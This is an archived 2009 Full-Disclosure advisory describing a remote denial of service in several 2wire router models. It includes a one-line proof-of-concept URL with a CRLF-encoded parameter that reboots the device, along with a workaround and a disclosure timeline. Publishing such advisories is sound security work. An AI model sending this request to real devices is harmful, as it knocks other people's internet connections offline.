Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Full Disclosure: Full-Disclosure

2wire Remote Denial of Service

  

 
Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded


hkm at hakim

Oct 29, 2009, 10:18 AM

Post #1 of 1 (228 views)
Permalink
2wire Remote Denial of Service
========================================
2WIRE REMOTE DENIAL OF SERVICE
========================================


Device: 2wire Gateway Router/Modem
Vulnerable Software: =< 5.29.52
Vulnerable Models: 1700HG
1701HG
1800HW
2071
2700HG
2701HG-T
Release Date: 2009-10-29
Last Update: 2009-09
Critical: Moderately critical
Impact: Denial of service
Remote router reboot
Where: From remote
In the remote management interface
Solution Status: Vendor issued firmware patches
Providers are in charge of applying the patches
WebVuln Advisory: 1-003


BACKGROUND
=======================

The remote management interface of some 2wire modems is enabled by
default.
This interface runs over SSL on port 50001 with an untrusted issuer
certificate.

++Español
Algunos módems 2wire tienen la interfaz remota habilitada por default.
La interfaz utiliza SSL con un certificado invalido en el puerto 50001.


DESCRIPTION
=======================

Some 2wire modems are vulnerable to a remote denial of service attack.
By requesting a special url from the Remote Management interface, an
unathenticated
user can remotely reboot the complete device.

++
Algunos módems 2wire son vulnerables a un ataque de denegación de
servicio.
Un usuario no autenticado puede reiniciar el dispositivo enviando una
petición a
la interfaz de Administración remota.


EXPLOIT / POC
=======================

https://<remoteIP>:50001/xslt?page=%0d%0a


WORKAROUND
=======================

Disable Remote Management in Firewall -> Advanced Settings.

++
Deshabilitar Administración remota en Cortafuegos -> Configuración
avanzada


DISCLOSURE TIMELINE
=======================

2009/09/06 - Vulnerability discovered
2009/09/08 - Vendor contacted


=======================

h k m
hkm [at] hakim
http://www.hakim.ws

http://www.webvuln.com/

=======================
Greets:
preth00nker, DromoroK, mr.ebola, Javier, d0ct0r_4rz0v1zp0, ch [at] ve, fito,
HL, Xianur0, Pr [at] fEs0 X, Daemon, us3r.


REFERENCES
=======================

Preth00nker's exploit (LAN) - http://www.milw0rm.com/exploits/2246
2Wire Gateways CRLF DoS (from local network) -
http://secunia.com/advisories/21583
Hakim.Ws - http://www.hakim.ws
WebVuln - http://www.webvuln.com



2009-09 - WebVuln - http://www.webvuln.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact Gossamer Threads
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.